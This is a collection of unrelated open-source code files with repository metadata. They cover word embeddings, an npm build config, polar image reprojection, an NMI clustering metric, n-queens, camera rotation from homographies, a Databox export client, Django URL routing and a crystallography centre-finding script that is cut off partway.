| blob_id: 8a2b59abaae0e0a34340223ccf9dc23804f60308 | directory_id: 578ff5c105747dc7520b11cd73893b32e458d9e5 | content_id: 530a3e254b12603370a7ec3861df2021bb382ba5 |
| path: /utils_ref/word_embed.py | repo_name: dulangaweerakoon/PhraseCutDataset | branch_name: refs/heads/master |
| snapshot_id: 8cad581c8a059a0f2256ed580f5c1c71601ea875 | revision_id: 86401015bf5c372a103d8459ad46a59455d6492b |
| detected_licenses: [] | license_type: no_license | visit_date: 2022-11-27T01:47:33.173591 | revision_date: 2020-07-19T08:49:29 | committer_date: 2020-07-19T08:49:29 |
| github_id: 277,823,431 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: 2020-07-07T13:25:25 | gha_created_at: 2020-07-07T13:25:25 | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,386 | extension: py |
content:
import numpy as np
class WordEmbed:
def __init__(self, lookup_path='data/fast_text/lookup_refvg_all.npy', vocab_size=-1, word_freq_thresh=0,
init_embed='fast_text'):
lookup = np.load(lookup_path, allow_pickle=True).item()
end_ix = len(lookup['ix_to_word']) # word[end_ix] is excluded from vocab
if vocab_size > 0:
end_ix = min(vocab_size, end_ix)
if word_freq_thresh > 0:
new_end_ix = end_ix
for i, f in enumerate(lookup['freq'][:end_ix]):
if f < word_freq_thresh:
new_end_ix = i
break
end_ix = new_end_ix
self.ix_to_word = lookup['ix_to_word'][:end_ix]
self.word_to_ix = {word: ix for ix, word in enumerate(self.ix_to_word)}
self.vocab_size = end_ix
print('vocabulary size: %d; minimum word frequency: %d' % (end_ix, lookup['freq'][end_ix - 1]))
if init_embed == 'fast_text':
self.embeddings = lookup['embeddings'][:end_ix]
elif init_embed == 'random':
self.embeddings = np.random.randn(end_ix, 300)
else:
self.embeddings = None
def encode_sentences_to_labels(self, sentences, label_length):
"""
Sentences are encoded with <BOS> at the beginning, <EOS> at the end, <PAD> if less than label_length,
<UNK> if there are unknown words. label_length includes <BOS> and <EOS>.
<PAD> --> 0; <UNK> --> 1; <BOS> --> 2; <EOS> --> 3
input sentences: list of n sentences in string format
return: int32 (n, label_length) zeros padded in end
"""
assert self.word_to_ix['<PAD>'] == 0
num_sents = len(sentences)
if num_sents == 0:
return None
labels = np.zeros((num_sents, label_length), dtype=np.int32)
for i, sentence in enumerate(sentences):
words = self.sentence_to_words(sentence)
for j, w in enumerate(words):
if j == label_length:
break
labels[i, j] = self.word_to_ix.get(w, self.word_to_ix['<UNK>'])
return labels
@staticmethod
def sentence_to_words(sentence):
def replace_special(string):
special = ['-', "'", ',', ':', '<', '.', '/', '?', '*', '"', '\\', '&', '\x00', '`', '!', ']', '[', '+',
'@', '(', ')']
string = string.lower()
i = 0
while i < len(string):
c = string[i]
if c in special:
string = string[:i] + ' ' + c + ' ' + string[i + 1:]
i += 2
i += 1
return string
sentence = replace_special(sentence)
words = sentence.split()
words = ['<BOS>'] + words + ['<EOS>']
return words
def decode_labels_to_sentences(self, labels):
"""
labels: int32 (n, label_length) zeros padded in end
return: list of sents in string format
"""
# print(labels)
decoded_sent_strs = []
num_sents = labels.shape[0]
for i in range(num_sents):
label = labels[i].tolist()
sent_str = ' '.join([self.ix_to_word[int(i)] for i in label if i != 0 and i != 2 and i != 3])
decoded_sent_strs.append(sent_str)
return decoded_sent_strs
| authors: ["dulanga.weerakoon.lk@gmail.com"] | author_id: dulanga.weerakoon.lk@gmail.com |
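encode_sentences_to_labels in word_embed.py documents the label layout &lt;BOS&gt; w1 ... wn &lt;EOS&gt; &lt;PAD&gt;... A minimal sketch of that layout with a tiny assumed vocabulary; the real lookup table comes from lookup_refvg_all.npy and is not reproduced here.

```python
# Illustration of the label layout from encode_sentences_to_labels, using an
# assumed six-word vocabulary instead of the real lookup table.
import numpy as np

ix_to_word = ['<PAD>', '<UNK>', '<BOS>', '<EOS>', 'red', 'car']
word_to_ix = {w: i for i, w in enumerate(ix_to_word)}

def encode(sentence_words, label_length):
    labels = np.zeros(label_length, dtype=np.int32)        # zero padding -> <PAD>
    words = ['<BOS>'] + sentence_words + ['<EOS>']
    for j, w in enumerate(words[:label_length]):
        labels[j] = word_to_ix.get(w, word_to_ix['<UNK>'])  # unknown words -> <UNK>
    return labels

print(encode(['red', 'car'], 6))   # [2 4 5 3 0 0]
print(encode(['blue', 'car'], 6))  # [2 1 5 3 0 0]  ('blue' is out of vocabulary)
```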
| blob_id: 5fcf59afbbbc3f3e3cf18d7345abfcc604f5a5eb | directory_id: 2f2bd2556353bfdd8fb32f2fd996101a51c72a5c | content_id: 2f096b356c4ca1e0356de426b48ce11ba5a6341e |
| path: /node_modules/peer/node_modules/restify/node_modules/dtrace-provider/build/config.gypi | repo_name: kenchangh/liveline | branch_name: refs/heads/master |
| snapshot_id: 01602776febbcef6357390188c5915e35bd8244a | revision_id: 555cc291dd689aaf61cc0383b7b0260602281fd0 |
| detected_licenses: ["MIT", "BSD-2-Clause"] | license_type: permissive | visit_date: 2021-05-27T13:58:10.947645 | revision_date: 2014-08-01T06:25:46 | committer_date: 2014-08-01T06:25:46 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,166 | extension: gypi |
content:
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/data/opt/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/home/maverick/.node-gyp/0.10.30",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"sign_git_tag": "",
"user_agent": "npm/1.4.21 node/v0.10.30 linux x64",
"always_auth": "",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"user": "1000",
"force": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"cache_max": "Infinity",
"userconfig": "/home/maverick/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/tmp",
"depth": "Infinity",
"save_dev": "",
"usage": "",
"cafile": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr/local",
"registry": "https://registry.npmjs.org/",
"browser": "",
"cache_lock_wait": "10000",
"save_optional": "",
"searchopts": "",
"versions": "",
"cache": "/home/maverick/.npm",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"ca": "",
"cert": "",
"global": "",
"link": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "",
"node_version": "0.10.30",
"tag": "latest",
"git_tag_version": "true",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"save_exact": "",
"strict_ssl": "true",
"username": "",
"dev": "",
"globalconfig": "/usr/local/etc/npmrc",
"init_module": "/home/maverick/.npm-init.js",
"parseable": "",
"globalignorefile": "/usr/local/etc/npmignore",
"cache_lock_retries": "10",
"save_prefix": "^",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"email": "",
"json": "",
"spin": "true"
}
}
| authors: ["guanhao3797@gmail.com"] | author_id: guanhao3797@gmail.com |
| blob_id: 3715d582eda0e08ee9b12fe4425c41b8a4861879 | directory_id: 61930bf19a6c271a021cc105f1edbb8f86dbb337 | content_id: 3e0a8f033acc15b7bbe13a8c2b2fcf4b75527328 |
| path: /maximus48/polar.py | repo_name: maximka48/XIMG-EMBL | branch_name: refs/heads/master |
| snapshot_id: 50d5b9c3c138f4ea403658507c24993bf82fbcf3 | revision_id: 0178822dfbf4b1a249d510030b21fca28d51d2c0 |
| detected_licenses: ["MIT"] | license_type: permissive | visit_date: 2022-03-24T15:57:37.729211 | revision_date: 2021-11-20T14:31:00 | committer_date: 2021-11-20T14:31:00 |
| github_id: 234,130,531 | star_events_count: 2 | fork_events_count: 2 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,555 | extension: py |
content:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 7 14:58:53 2019
@author: mpolikarpov
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy
import cv2
class polar_image:
'''
description
'''
# =============================================================================
# def __init__(self, data, origin = None):
# """Constructor"""
# self.data = data
# self.origin = origin
# =============================================================================
def __init__(self):
"""Constructor"""
pass
# =============================================================================
# some functions for polar interpolation
# =============================================================================
def plot_polar_image(self, data, origin=None):
"""Plots an image reprojected into polar coordinages with the origin
at "origin" (a tuple of (x0, y0), defaults to the center of the image)"""
polar_grid, r, theta = self.reproject_image_into_polar(data, origin)
plt.figure()
plt.imshow(polar_grid, extent=(theta.min(), theta.max(), r.max(), r.min()))
plt.axis('auto')
plt.ylim(plt.ylim()[::-1])
plt.xlabel('Theta Coordinate (radians)')
plt.ylabel('R Coordinate (pixels)')
plt.title('Image in Polar Coordinates')
def index_coords(self, data, origin=None):
"""Creates x & y coords for the indicies in a numpy array "data".
"origin" defaults to the center of the image. Specify origin=(0,0)
to set the origin to the lower left corner of the image."""
ny, nx = data.shape[:2]
if origin is None:
origin_x, origin_y = nx // 2, ny // 2
else:
origin_x, origin_y = origin
x, y = np.meshgrid(np.arange(nx), np.arange(ny))
x -= origin_x
y -= origin_y
return x, y
def cart2polar(self, x, y):
r = np.sqrt(x**2 + y**2)
theta = np.arctan2(y, x)
return r, theta
def polar2cart(self, r, theta):
x = r * np.cos(theta)
y = r * np.sin(theta)
return x, y
def reproject_image_into_polar(self, data, origin=None):
"""Reprojects a 3D numpy array ("data") into a polar coordinate system.
"origin" is a tuple of (x0, y0) and defaults to the center of the image."""
# horizontal direction on the image will be theta coordinate
#(with 0 in the image center), vertical - R coordinate (with 0 in left top corner)
data = cv2.merge([data,data,data])
ny, nx = data.shape[:2]
if origin is None:
origin = (nx//2, ny//2)
# Determine that the min and max r and theta coords will be...
x, y = self.index_coords(data, origin=origin)
r, theta = self.cart2polar(x, y)
# Make a regular (in polar space) grid based on the min and max r & theta
r_max = int(round(np.sqrt((nx//2)**2 + (ny//2)**2)))
r_i = np.linspace(r.min(), r.max(), r_max)
theta_i = np.linspace(theta.min(), theta.max(), 360)
theta_grid, r_grid = np.meshgrid(theta_i, r_i)
# Project the r and theta grid back into pixel coordinates
xi, yi = self.polar2cart(r_grid, theta_grid)
xi += origin[0] # We need to shift the origin back to
yi += origin[1] # back to the lower-left corner...
xi, yi = xi.flatten(), yi.flatten()
coords = np.vstack((xi, yi)) # (map_coordinates requires a 2xn array)
# Reproject each band individually and then restack
# (uses less memory than reprojecting the 3-dimensional array in one step)
bands = []
for band in data.T:
zi = scipy.ndimage.map_coordinates(band, coords, order=1)
bands.append(zi.reshape((r_max, 360)))
output = np.dstack(bands)
return output#, r_i, theta_i
def baseline(self, data1D, polynom = 5):
'''
subtract the baseline from a 1D curve
'''
x = np.linspace(0, data1D.shape[0], len(data1D), dtype = 'uint16')
y = data1D
pfit = np.polyfit(x, y, polynom) # returns polynomial coefficients
yp = np.polyval(pfit, x) # fits the curve,
smoothed = data1D - yp # subtract baseline
return smoothed
| authors: ["mpolikarpov@embl-hamburg.de"] | author_id: mpolikarpov@embl-hamburg.de |
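The cart2polar / polar2cart pair in polar.py is a plain coordinate transform. A short round-trip check, written here as free functions under the assumption that the class methods above are not importable:

```python
# Round-trip check of the cartesian <-> polar transform used in polar_image.
import numpy as np

def cart2polar(x, y):
    return np.sqrt(x**2 + y**2), np.arctan2(y, x)

def polar2cart(r, theta):
    return r * np.cos(theta), r * np.sin(theta)

x, y = np.array([3.0, -1.0]), np.array([4.0, 2.0])
r, theta = cart2polar(x, y)                       # r = [5.0, sqrt(5)], theta in radians
x2, y2 = polar2cart(r, theta)
print(np.allclose(x, x2) and np.allclose(y, y2))  # True
```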
| blob_id: 83069894a76b2d3a5e4b915aa5beeb0470266310 | directory_id: ae674db34a41ed4748208d7fc255302352aed2cb | content_id: e7226c8e22a612aeaca2f83490bb2b21098167f6 |
| path: /NMI_calculation/NMI_calculation.py | repo_name: zhang134/OTUs_clustering | branch_name: refs/heads/main |
| snapshot_id: 4dd676957ee8b5476a2c877b3a3856e94a4bd802 | revision_id: ec0e15d14073178d5edae8dc7685ed516b70b64b |
| detected_licenses: [] | license_type: no_license | visit_date: 2023-03-03T11:11:10.938624 | revision_date: 2021-02-03T06:33:09 | committer_date: 2021-02-03T06:33:09 |
| github_id: 302,034,277 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,927 | extension: py |
content:
import math
import sys
import os
import getopt
def readList(listfile):
goldDict={}
testDict={}
readsNum=0
for line in open(listfile,'r'):
readsNum+=1
lineList=line.strip().split()
if len(lineList) != 3:
print "***There is an error in input file, at %d row.\nthree column that separated by tab is requred.***"
sys.exit(1)
seqname=lineList[0]
specie=lineList[1]
cluster=lineList[2]
#insert to gold dictionary
goldList=goldDict.get(specie,[])
goldList.append(seqname)
goldDict[specie]=goldList
#insert test dictionary
testList=testDict.get(cluster,[])
testList.append(seqname)
testDict[cluster]=testList
return goldDict,testDict,readsNum
def NMIcalculater(listfile):
goldDict,testDict,readsNum=readList(listfile)
I_value=0
Hs_value=0
Hc_value=0
N=float(readsNum) #number of all reads
#H(C)
for cluster in testDict:
clusterSeq=testDict[cluster]
Cj=float(len(clusterSeq))
sub_Hc=-((Cj/N)*math.log(Cj/N))
Hc_value+=sub_Hc
#H(S)
for specie in goldDict:
specieSeq=goldDict[specie]
Si=float(len(specieSeq))
sub_Hs=-Si/N*math.log(Si/N)
Hs_value+=sub_Hs #H(S)
#I(S,C)
for specie in goldDict:
specieSeq=goldDict[specie]
Si=float(len(specieSeq))
for cluster in testDict:
clusterSeq=testDict[cluster]
intersection=list(set(specieSeq).intersection(set(clusterSeq)))
if len(intersection)==0:
continue
Aij=float(len(intersection))
Cj=float(len(clusterSeq))
subI_log=math.log((Aij/N)/((Si*Cj)/(N*N)))
sub_I=(Aij/N)*subI_log
I_value+=sub_I
NMI_value=(2*I_value)/(Hs_value+Hc_value)
return NMI_value
if __name__=="__main__":
usage="""usage: python NMI_caculation.py --input <inputfile>
--input/-i the list file (three column separated by tab) for all sequence names. The first column is the sequence names, the second column is the species, and third column is the cluster names.
--help/-h help
"""
opts,arg=getopt.getopt(sys.argv[1:],"i:h:",['input=','help='],)
parameters=[a[0] for a in opts]
if '-h' in parameters or '--help' in parameters:
print usage
sys.exit(1)
if len(parameters)==0:
print usage
sys.exit(1)
if '-i' not in parameters and '--input' not in parameters:
print "***Error, a input file is requred.***\n"
print usage
sys.exit(1)
#
for i,a in opts:
if i in ("--input","-i"):
if not os.path.isfile(a):
print "***%s is not found.***"%(a)
print usage
sys.exit(1)
inputfile=a
nmi=NMIcalculater(inputfile)
print "\nNMI value: %f\n"%(nmi)
| authors: ["noreply@github.com"] | author_id: zhang134.noreply@github.com |
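NMI_calculation.py accumulates the entropies and the mutual information term by term. Written out, the quantities it computes correspond to the standard definition (notation assumed here: S is the gold species partition with class sizes S_i, C the cluster partition with sizes C_j, A_ij the size of the intersection of species i and cluster j, and N the total number of reads):

```latex
H(S) = -\sum_i \frac{S_i}{N}\log\frac{S_i}{N}, \qquad
H(C) = -\sum_j \frac{C_j}{N}\log\frac{C_j}{N}

I(S, C) = \sum_{i,j} \frac{A_{ij}}{N}\,\log\frac{A_{ij}/N}{(S_i/N)\,(C_j/N)}, \qquad
\mathrm{NMI}(S, C) = \frac{2\, I(S, C)}{H(S) + H(C)}
```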
| blob_id: e832b19f088e3c07c3bc1040ffe8704174b85fcd | directory_id: 0f56f4692bdfacb7adda41786718df480fc949fe | content_id: c34e1fec2cd05871b4da8aab24afbf791896d81a |
| path: /nQueens.py | repo_name: freephys/CodingPractice | branch_name: refs/heads/master |
| snapshot_id: ca4ee5a2d8701934cfd6d4c2b15e7e00d58a2064 | revision_id: dee421a78fdea5f6a695ae2423383f4a21f98e32 |
| detected_licenses: [] | license_type: no_license | visit_date: 2023-07-11T18:27:29.761786 | revision_date: 2021-08-13T01:54:04 | committer_date: 2021-08-13T01:54:04 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 562 | extension: py |
content:
def nQueens(n):
res = []
def isValid(offset, cur):
for i in range(offset):
diff = abs(cur[offset] - cur[i])
if diff == 0 or diff == offset - i:
return False
return True
def helper(offset, cur):
if offset == n:
res.append(cur.copy())
return
for i in range(1, n + 1):
cur[offset] = i
if isValid(offset, cur):
helper(offset + 1, cur)
cur[offset] = 0
cur = [0] * n
helper(0, cur)
return res
| authors: ["mengzhehuang@gmail.com"] | author_id: mengzhehuang@gmail.com |
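A brief usage note for the backtracking solver above, assuming nQueens from that file is in scope (pasted in or imported):

```python
# Each solution lists, per board row, the 1-based column of the queen in that row.
solutions = nQueens(4)
print(len(solutions))  # 2
print(solutions)       # [[2, 4, 1, 3], [3, 1, 4, 2]]
```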
| blob_id: 80994cabe8186bfede033958693fb604306b5a42 | directory_id: f0d46d6647e9bae4da0d0b5328e869263ff7e008 | content_id: 30c7ab902e595361dffc9acf3734a34d247f9e3c |
| path: /Exercise3/main.py | repo_name: Gruppe3VDL/3D_computer_vision | branch_name: refs/heads/master |
| snapshot_id: 5d06b49ac00b1b601fb7c78c53f558a7ab741c33 | revision_id: 9f49055db096983624c65b4240d7852a29a3f850 |
| detected_licenses: ["MIT"] | license_type: permissive | visit_date: 2020-09-05T04:53:59.590062 | revision_date: 2019-12-22T13:31:12 | committer_date: 2019-12-22T13:31:12 |
| github_id: 219,987,749 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,817 | extension: py |
content:
import os
import sys
import numpy as np
import cv2 as cv
import scipy.io as io
from collections import OrderedDict
import copy
def build_k_matrix(data):
k= np.array([[data['alpha_x'][0,0], data['s'][0,0],data['x_0'][0,0]],
[0, data['alpha_y'][0,0], data['y_0'][0,0]],
[0,0,1]])
return np.array(k)
def is_orthogonal(R):
I = np.abs(R.dot(R.T))
cond = np.allclose(I, np.eye(3), atol=0.001)
return cond
def correct_error(R):
u, s, vh = np.linalg.svd(R, full_matrices=True)
R = u.dot(vh)
return R
def compute_relative_rotation():
base_folder = './data/'
data = io.loadmat(base_folder + 'ex3.mat')
K = build_k_matrix(data)
K_inv = np.linalg.inv(K)
H_arr = [data["H1"], data["H2"]]
for i in range(0, len(H_arr)):
print("Computing rotation from homography for H"+str(i+1)+":")
H = H_arr[i]
print("Homography Matrix:")
print(H)
E = K_inv.dot(H)
R = np.ones((3,3))
R[:,0:2]= E[:,0:2]
# Normalize R1, R2
norm_factor = (np.linalg.norm(R[:,0]) + np.linalg.norm(R[:,1])) / 2
R[:, 0] /= norm_factor
R[:, 1] /= norm_factor
R[:,-1 ]= np.cross(R[:,0].T, R[:,1].T)
print("Computed Rotation Matrix from Homography is:")
print(R)
print("Is this orthogonal?")
if not is_orthogonal(R):
print("NO. Making orthogonal...")
R = correct_error(R)
print("Test R.dot(R.T)==I again. Is it passed?:", is_orthogonal(R))
print("Rrel for H" + str(i+1)+ " is:")
print(R)
else:
print("YES.")
print("then Rrel for H"+str(i+1)+" is:")
print(R)
print("----------------------------------------")
def compute_pose():
base_folder = './data/'
data = io.loadmat(base_folder + 'ex3.mat')
H3_Homography = data['H3']
x_0=data['x_0']
y_0=data['y_0']
alpha_x=data['alpha_x']
alpha_y=data['alpha_y']
s=data["s"]
K_matrix=[[alpha_x[0][0],s[0][0],x_0[0][0]],
[0,alpha_y[0][0],y_0[0][0]],
[0,0,1]]
K_inverse=np.linalg.inv(K_matrix)
Projection_matrix=np.matmul(K_inverse,H3_Homography)
Projection_matrix=np.matmul(Projection_matrix,K_matrix)
r_1=Projection_matrix[:,0]
r_2=Projection_matrix[:,1]
mag_r1 = np.linalg.norm(r_1)
mag_r2 = np.linalg.norm(r_2)
lambda_=(mag_r1+mag_r2)/2
r_1/=lambda_
r_2/=lambda_
r_3=np.cross(r_1,r_2)
translation=Projection_matrix[:,2]
translation/=lambda_
Rotation_matrix=np.column_stack((r_1,r_2,r_3))
print("Rotation Matrix",Rotation_matrix)
print("translation",translation)
print("----------------------------------------")
print("Question 3")
print("----------------------------------------")
compute_relative_rotation()
print("----------------------------------------")
print("Question 4")
print("----------------------------------------")
compute_pose()
| authors: ["gulzainali@gmail.com"] | author_id: gulzainali@gmail.com |
| blob_id: ddcbfea5a49f0411ebd847c047042c242258c2da | directory_id: 7330d978b8cb994fbfca5a64acd4984b86cdf6b5 | content_id: cf91210e98045b88b010c07b987be958fef62113 |
| path: /lib/export.py | repo_name: pooyadav/lib-python-databox | branch_name: refs/heads/master |
| snapshot_id: a1afd9de0c111ae576805f281a1cab806526a739 | revision_id: 25b4670d3c5706708b4d2bf8badea5c625232e78 |
| detected_licenses: [] | license_type: permissive | visit_date: 2022-02-18T03:01:00.880166 | revision_date: 2019-09-17T12:39:19 | committer_date: 2019-09-17T12:39:19 |
| github_id: 105,249,434 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: MIT | gha_event_created_at: 2019-08-12T11:53:51 | gha_created_at: 2017-09-29T08:34:36 | gha_language: Python |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 559 | extension: py |
content:
import lib.utils as utils
import os
import json
if "DATABOX_EXPORT_SERVICE_ENDPOINT" in os.environ:
exportServiceURL = os.environ['DATABOX_EXPORT_SERVICE_ENDPOINT']
else:
print("Export service endpoint is not defined")
exportServiceURL = ''
def longpoll(destination, payload):
newurl = exportServiceURL + '/lp/export'
return utils.makeStoreRequest(method = 'POST', jsonData = {'id': '', 'uri': destination, 'data': json.dumps(payload)}, url=newurl)
def queue(href, key, data):
raise NotImplementedError
| authors: ["py236@cam.ac.uk"] | author_id: py236@cam.ac.uk |
| blob_id: 3f92164670a5ea304825542ef150a9ac09c4c1b3 | directory_id: eedf9ef8437800116171f99689df4c0f28a67e93 | content_id: 86e247af94b1848cfedf8b65fab91c73da6c234c |
| path: /DjangoTest/urls.py | repo_name: hiCyoung/DjangoTest | branch_name: refs/heads/master |
| snapshot_id: 08f28d72049798ca2f28bc012e746820e652a2ed | revision_id: dabb6b2527fae3e1228654035dc63fce3ce83257 |
| detected_licenses: [] | license_type: no_license | visit_date: 2016-09-06T12:19:20.063794 | revision_date: 2013-06-24T01:49:50 | committer_date: 2013-06-24T01:49:50 |
| github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 681 | extension: py |
content:
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'DjangoTest.views.home', name='home'),
# url(r'^DjangoTest/', include('DjangoTest.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
url(r'^$','Test.views.hello', name='home'),
url(r'^hello/(\d{1,2})/(\d{1,2})/$','Test.views.test', name='home'),
)
| authors: ["328491755@qq.com"] | author_id: 328491755@qq.com |
| blob_id: a9e7f9d118621d4c456b471b3521436e8bfc7d72 | directory_id: 18e605d36d54c0f5178bda2139cd561d3a0ea057 | content_id: 1bca08c9083a318196a13724f465bb3f0016e784 |
| path: /crystfeler/py/json2center.py | repo_name: vachram97/still-utils | branch_name: refs/heads/master |
| snapshot_id: 756fb6fa57aa9deb78979182439e8f66b1415408 | revision_id: 34f2ec16afb1ea9a92c258087f13209710daca28 |
| detected_licenses: [] | license_type: no_license | visit_date: 2020-12-29T05:07:37.425716 | revision_date: 2020-09-14T17:05:39 | committer_date: 2020-09-14T17:05:39 |
| github_id: 238,465,071 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: 2020-02-05T14:08:03 | gha_created_at: 2020-02-05T14:08:02 | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 7,751 | extension: py |
content:
#!/usr/bin/env python3
import numpy as np
import json
import sys
import argparse
from tqdm import tqdm
from typing import List, Tuple
from itertools import combinations
import matplotlib.pyplot as plt
import warnings
def moving_average(arr: np.ndarray, window_size: int) -> np.ndarray:
"""
Return moving average of 1D array in numpy
Arguments:
arr {np.ndarray} -- input array
window_size {int} -- window size
Returns:
ret {np.ndarray} -- smoothened array
"""
ret = np.cumsum(arr, dtype=float)
ret[window_size:] = ret[window_size:] - ret[:-window_size]
return ret[window_size - 1 :] / window_size
def rms_mask(arr: np.ndarray, window_size: int, percentile=0.1) -> np.ndarray:
"""
Return mask where arr's deviation is smaller than it's mean*percentile:
RMSD[arr]_window_size < MEAN[arr]*percentile
Arguments:
arr {np.ndarray} -- input array
window_size {int} -- window size
Returns:
np.ndarray -- boolean mask
"""
arr_mean = moving_average(arr, window_size)
arr_rmsd = np.power(moving_average(np.power(arr, 2), window_size), 0.5)
return np.where(np.abs(arr_rmsd) < np.abs(arr_mean) * percentile)
def radial_binning(
fs: np.ndarray, ss: np.ndarray, rs: np.ndarray, N=1000
) -> np.ndarray:
"""
Returns binned by radius table
Arguments:
fs {np.ndarray} -- np.ndarray of x values
ss {np.ndarray} -- np.ndarray of y values
rs {np.ndarray} -- np.ndarray of r values
Keyword Arguments:
N {int} -- number of bins (default: {1000})
Returns:
answ {np.ndarray} -- (len(fs), 4) shape: rmean, num, fsmean, ssmean
"""
rmin, rmax = rs.min(), rs.max()
step = (rmax - rmin) / N
answ = []
for rcur, _ in tqdm(
enumerate(np.linspace(rmin, rmax, N)), desc="Binning values", total=N
):
mask = (rs < rcur + step) & (rs >= rcur)
if sum(mask) > 0:
rmean = rs[mask].mean()
num = mask.sum()
fsmean = fs[mask].mean()
ssmean = ss[mask].mean()
answ.append([rmean, num, fsmean, ssmean])
answ = np.array(answ)
return answ
def ang(v1, v2):
"""
Returns angle between two vectors
"""
return np.abs(np.arccos(np.dot(v1, v2) / np.linalg.norm(v1) / np.linalg.norm(v2)))
def is_inside(triangle: np.ndarray, point: np.ndarray) -> bool:
"""
Checks whether point is inside a triangle
Arguments:
triangle {np.pdarray} -- triangle coordinates (3,2) shape
point {np.ndarray} -- point to check (x,y)
Returns:
bool -- check value
"""
a, b, c = triangle
oa, ob, oc = a - point, b - point, c - point
return (
np.abs(
sum([ang(v1, v2) for v1, v2 in combinations([oa, ob, oc], 2)]) - 2 * np.pi
)
< 1e-2
)
def get_center_position_from_binning(
binning: np.ndarray, rmin=None, rmax=None
) -> Tuple[Tuple[float, float], Tuple[float, float]]:
"""
Estimate center position from binning results
Arguments:
binning {np.ndarray} -- input (N,4) shape array
Keyword Arguments:
rmin {[type]} -- lower radius threshold (default: {None})
rmax {[type]} -- upper radius threshold (default: {None})
Returns:
Tuple[Tuple[float, float], Tuple[float, float]] -- (fs, ss) tuple
"""
rs, num, fs, ss = binning.T
if rmin is None:
rmin = float("-inf")
if rmax is None:
rmax = float("inf")
mask = (rs >= rmin) & (rs < rmax)
fs_val, fs_std = fs[mask].mean(), fs[mask].std()
ss_val, ss_std = ss[mask].mean(), ss[mask].std()
return (fs_val, fs_std), (ss_val, ss_std)
def circle(points: np.ndarray, acute_angle=True, presumable_centre=None) -> np.ndarray:
"""
Returns coordinates and radius of circumscribed circle for 3 points.
Arguments:
points {np.ndarray} -- (3,2)-shaped array
Keyword Arguments:
acute_angle {bool} -- whether the points should form an acute-angled triangle (default: {True})
presumable_centre {np.ndarray} -- approximate centre position to check whether it's inside the triangle of points
Returns:
np.ndarray -- (x,y,R)
"""
x1, y1, x2, y2, x3, y3 = points.reshape(-1,)
A = np.array([[x3 - x1, y3 - y1], [x3 - x2, y3 - y2]])
Y = np.array(
[
(x3 ** 2 + y3 ** 2 - x1 ** 2 - y1 ** 2),
(x3 ** 2 + y3 ** 2 - x2 ** 2 - y2 ** 2),
]
)
if acute_angle:
if not is_inside(points, points.mean(axis=0)):
return None
if presumable_centre is not None:
if not is_inside(points, presumable_centre):
return None
if np.abs(np.linalg.det(A)) < 1e-3:
return None
Ainv = np.linalg.inv(A)
X = 0.5 * np.dot(Ainv, Y)
x, y = X[0], X[1]
r = np.sqrt((x - x1) ** 2 + (y - y1) ** 2)
return (x, y, r)
def main(args: List[str]):
"""
The main function
Arguments:
